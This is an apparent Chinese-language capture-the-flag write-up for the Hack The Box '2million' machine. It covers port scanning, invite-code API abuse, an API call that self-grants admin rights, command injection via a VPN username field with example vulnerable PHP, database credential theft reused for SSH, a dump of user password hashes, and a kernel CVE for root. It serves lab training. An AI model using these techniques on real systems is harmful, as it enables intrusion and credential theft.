2023年6月13日 10:05:44
Nmap
┌──(root💀kali)-[~]
└─# nmap -sCV 10.10.11.221
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-12 22:03 EDT
Nmap scan report for 10.10.11.221
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_ 256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp open http nginx
|_http-title: Did not follow redirect to http://2million.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds
经典两个端口22,80
image.png
修改/etc/hosts文件
image.png
image.png
有登录,猜测有注册
访问/regiser
image.png
注册发现也失败了,需要邀请码,走投无路的感觉- - ,翻翻bp历史,看看有没有生成code相关逻辑的.
inviteapi.min.js
image.png
设置过滤器
image.png
这个js文件看起来像和邀请码有关系的逻辑
image.png
这段代码其实是生成了一个名叫makeInviteCode 的函数,我们在console调用一下
image.png
function verifyInviteCode(code) {
var formData = {
"code": code
};
$.ajax({
type: "POST",
dataType: "json",
data: formData,
url: '/api/v1/invite/verify',
success: function(response) {
console.log(response)
},
error: function(response) {
console.log(response)
}
})
}
function makeInviteCode() {
$.ajax({
type: "POST",
dataType: "json",
url: '/api/v1/invite/how/to/generate',
success: function(response) {
console.log(response)
},
error: function(response) {
console.log(response)
}
})
}
有一个路由
POST /api/v1/invite/how/to/generate HTTP/1.1
Host: 2million.htb
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Content-Type: application/json
Origin: http://2million.htb
Referer: http://2million.htb/invite
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=stdisqd79m2j4qb1f3s9a6f250
Connection: close
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 Jun 2023 03:28:53 GMT
Content-Type: application/json
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 249
{"0":200,"success":1,"data":{"data":"Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb \/ncv\/i1\/vaivgr\/trarengr","enctype":"ROT13"},"hint":"Data is encrypted ... We should probbably check the encryption type in order to decrypt it..."}
image.png
ROT13解密
image.png
他让我们请求/api/v1/invite/generate这个路由
image.png
base64解密一下
接着就进行注册以及登录的操作
登录后台
登录之后我们进入到了一个类似HTB的界面
image.png
这里可以下载ovpn配置文件但是连接不上去
image.png
连接前把这个解析的域名记得加入到 /etc/hosts文件
image.png
/api/v1
我们获取路由列表登录过后有授权了
image.png
其中有一个路由settings/update 更新设置
image.png
我们直接发起请求,回显发现Invalid content type , 失效的内容类型
换成json试试
image.png
image.png
根据回显操作,我们已经把自己修改成为了管理员权限
image.png
验证管理员权限成功
image.png
通过这个路由生成了一个带vpn权限的ovpn配置文件,前面自己使用普通用户的ovpn配置文件失败
结果这个地方生成的配置文件还是用不了,那么接下来我们该怎么做呢- -
RCE
我们可以思考一下这个地方生成配置文件的位置,是如何生成的呢???!
image.png
他读取我们的参数,然后在配置文件里面也有体现,所以会不会是利用类似下面代码的来实现的呢
下面的代码只是例子,具体实现不一定是这样
<?php
$username = $_POST["username"];
system("openvpn"+$username);
所以这里可能存在命令执行
image.png
这样好像并没有执行成功 那当我们再加一个注释符号**# 呢?**
在linux系统中 # 这个符号后面的内容会当作注释来解释
image.png
芜湖!!!
<?php
$username = $_POST["username"];
system("openvpn"+$username+"Paramter");
所以他逻辑估计是这样的结构 ,后面存在别的参数 # 把后面的参数注释后就成功了
同理我们也可以直接在id后面再加上一个; 也可以执行代码成功
image.png
反弹shell
image.png
数据库配置文件
image.png
| username | password |
|---|---|
| admin | SuperDuperPass123 |
www-data@2million:~/html$ which python3
which python3
/usr/bin/python3
www-data@2million:~/html$ python3 -c "import pty;pty.spawn('/bin/bash')"
python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@2million:~/html$ mysql -u admin -p
mysql -u admin -p
Enter password: SuperDuperPass123
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 334231
Server version: 10.6.12-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| htb_prod |
| information_schema |
+--------------------+
2 rows in set (0.001 sec)
MariaDB [(none)]>
通过python3获取一个交互式更强的shell,连接mysql数据库
MariaDB [(none)]> use htb_prod;
use htb_prod;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [htb_prod]> show tables;
show tables;
+--------------------+
| Tables_in_htb_prod |
+--------------------+
| invite_codes |
| users |
+--------------------+
2 rows in set (0.000 sec)
MariaDB [htb_prod]> select * from users;
select * from users;
+----+--------------+----------------------------+--------------------------------------------------------------+----------+
| id | username | email | password | is_admin |
+----+--------------+----------------------------+--------------------------------------------------------------+----------+
| 11 | TRX | trx@hackthebox.eu | $2y$10$TG6oZ3ow5UZhLlw7MDME5um7j/7Cw1o6BhY8RhHMnrr2ObU3loEMq | 1 |
| 12 | TheCyberGeek | thecybergeek@hackthebox.eu | $2y$10$wATidKUukcOeJRaBpYtOyekSpwkKghaNYr5pjsomZUKAd0wbzw4QK | 1 |
| 13 | admin1 | admin@test.org | $2y$10$qVCYOU26KpbHwZdKYQo2YOkthu2Lik9N7vrqZ4/NQoSPjObR0N20S | 1 |
| 14 | shade1 | shade1@shade.com | $2y$10$rnJHveB0D9q6fJBtZLJ8/uy/uMI.qEicO6Lu5.k.I1talOCyPvywO | 1 |
| 15 | razorrob123 | shopovrobert@gmail.com | $2y$10$KGOX6WLIrGJi9tgozKDLTeoG3v0EDGew4e0FBIJoDpqlKPwRM//Pq | 0 |
| 16 | someb0dy | someb0dy@htb.com | $2y$10$SJPLEKKcBzP/G8dCxl0ADew14SzyKqSYw7/oloqYft8DTip//9BS6 | 1 |
+----+--------------+----------------------------+--------------------------------------------------------------+----------+
6 rows in set (0.000 sec)
MariaDB [htb_prod]>
这些数据估计是其他玩家插入的数据
查看带sh权限的用户
www-data@2million:~/html$ cat /etc/passwd | grep sh
cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
admin:x:1000:1000::/home/admin:/bin/bash
发现admin就是带sh的,直接用数据库的配置文件ssh登录尝试
image.png
Root
admin@2million:/var/mail$ cat admin
From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2
Hey admin,
I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.
HTB Godfather
admin@2million:/var/mail$
这里有一封邮件,说有一个CVE
CVE-2023-3086
Refer:https://github.com/xkaneiki/CVE-2023-0386
image.png
image.png
image.png
这里还有一封类似感谢信的东西
{"encryption": "xor", "encrpytion_key": "HackTheBox", "encoding": "base64", "data": "DAQCGXQgBCEELCAEIQQsSCYtAhU9DwofLURvSDgdaAARDnQcDTAGFCQEB0sgB0UjARYnFA0IMUgEYgIXJQQNHzsdFmICESQEEB87BgBiBhZoDhYZdAIKNx0WLRhDHzsPADYHHTpPQzw9HA1iBhUlBA0YMUgPLRZYKQ8HSzMaBDYGDD0FBkd0HwBiDB0kBAEZNRwAYhsQLUECCDwBADQKFS0PF0s7DkUwChkrCQoFM0hXYgIRJA0KBDpIFycCGToKAgk4DUU3HB06EkJLAAAMMU8RJgIRDjABBy4KWC4EAh90Hwo3AxxoDwwfdAAENApYKgQGBXQYCjEcESoNBksjAREqAA08QQYKNwBFIwEcaAQVDiYRRS0BHWgOBUstBxBsZXIOEwwGdBwNJ08OLRMaSzYNAisBFiEPBEd0IAQhBCwgBCEELEgNIxxYKgQGBXQKECsDDGgUEwQ6SBEqClgqBA8CMQ5FNgcZPEEIBTsfCScLHy1BEAM1GgwsCFRoAgwHOAkHLR0ZPAgMBXhIBCwLWCAADQ8nRQosTx0wEQYZPQ0LIQpYKRMGSzIdCyYOFS0PFwo4SBEtTwgtExAEOgkJYg4WLEETGTsOADEcEScPAgd0DxctGAwgT0M/Ow8ANgcdOk1DHDFIDSMZHWgHDBggDRcnC1gpD0MOOh4MMAAWJQQNH3QfDScdHWgIDQU7HgQ2BhcmQRcDJgETJxxYKQ8HSycDDC4DC2gAEQ50AAosChxmQSYKNwBFIQcZJA0GBTMNRSEAFTgNBh8xDEliChkrCUMGNQsNKwEdaAIMBSUdADAKHGRBAgUwSAA0CgoxQRAAPQQJYgMdKRMNDjBIDSMcWCsODR8mAQc3Gx0sQRcEdBwNJ08bJw0PDjccDDQKWCEPFw44BAwlChYrBEMfPAkRYgkNLQ0QSyAADDFPDiEDEQo6HEUhABUlFA0CIBFLSGUsJ0EGCjcARSMBHGgEFQ4mEUUvChUqBBFLOw5FNgcdaCkCCD88DSctFzBBAAQ5BRAsBgwxTUMfPAkLKU8BJxRDDTsaRSAKESYGQwp0GAQwG1gnB0MfPAEWYgYWKxMGDz0KCSdPEicUEQUxEUtiNhc9E0MIOwYRMAYaPRUKBDobRSoODi1BEAM1GAAmTwwgBEMdMRocYgkZKhMKCHQHA2IADTpBEwc1HAMtHRVoAA0PdAELMR8ROgQHSyEbRTYAWCsODR89BhAjAxQxQQoFOgcTIxsdaAAND3QNEy0DDi1PQzwxSAQwClghDA4OOhsALhZYOBMMHjBICiRPDyAAF0sjDUUqDg4tQQIINwcIMgMROwkGD3QcCiUKDCAEEUd0CQsmTw8tQQYKMw0XLhZYKQ8XAjcBFSMbHWgVCw50Cwo3AQwkBBAYdAUMLgoLPA4NDidIHCcbWDwOQwg7BQBsZXIABBEOcxtFNgBYPAkGSzoNHTZPGyAAEx8xGkliGBAtEwZLIw1FNQYUJEEABDocDCwaHWgVDEskHRYqTwwgBEMJOx0LJg4KIQQQSzsORSEWGi0TEA43HRcrGwFkQQoFJxgMMApYPAkGSzoNHTZPHy0PBhk1HAwtAVgnB0MOIAAMIQ4UaAkCCD8NFzFDWCkPB0s3GgAjGx1oAEMcOxoJJk8PIAQRDnQDCy0YFC0FBA50ARZiDhsrBBAYPQoJJ08MJ0ECBzhGb0g4ETwJQw8xDRUnHAxoBhEKIAERNwsdZGtpPzwNRQoOGyM1Cw4WBx1iOx0pDA=="
image.png
感谢信
Dear HackTheBox Community,
We are thrilled to announce a momentous milestone in our journey together. With immense joy and gratitude, we celebrate the achievement of reaching 2 million remarkable users! This incredible feat would not have been possible without each and every one of you.
From the very beginning, HackTheBox has been built upon the belief that knowledge sharing, collaboration, and hands-on experience are fundamental to personal and professional growth. Together, we have fostered an environment where innovation thrives and skills are honed. Each challenge completed, each machine conquered, and every skill learned has contributed to the collective intelligence that fuels this vibrant community.
To each and every member of the HackTheBox community, thank you for being a part of this incredible journey. Your contributions have shaped the very fabric of our platform and inspired us to continually innovate and evolve. We are immensely proud of what we have accomplished together, and we eagerly anticipate the countless milestones yet to come.
Here's to the next chapter, where we will continue to push the boundaries of cybersecurity, inspire the next generation of ethical hackers, and create a world where knowledge is accessible to all.
With deepest gratitude,
The HackTheBox Team
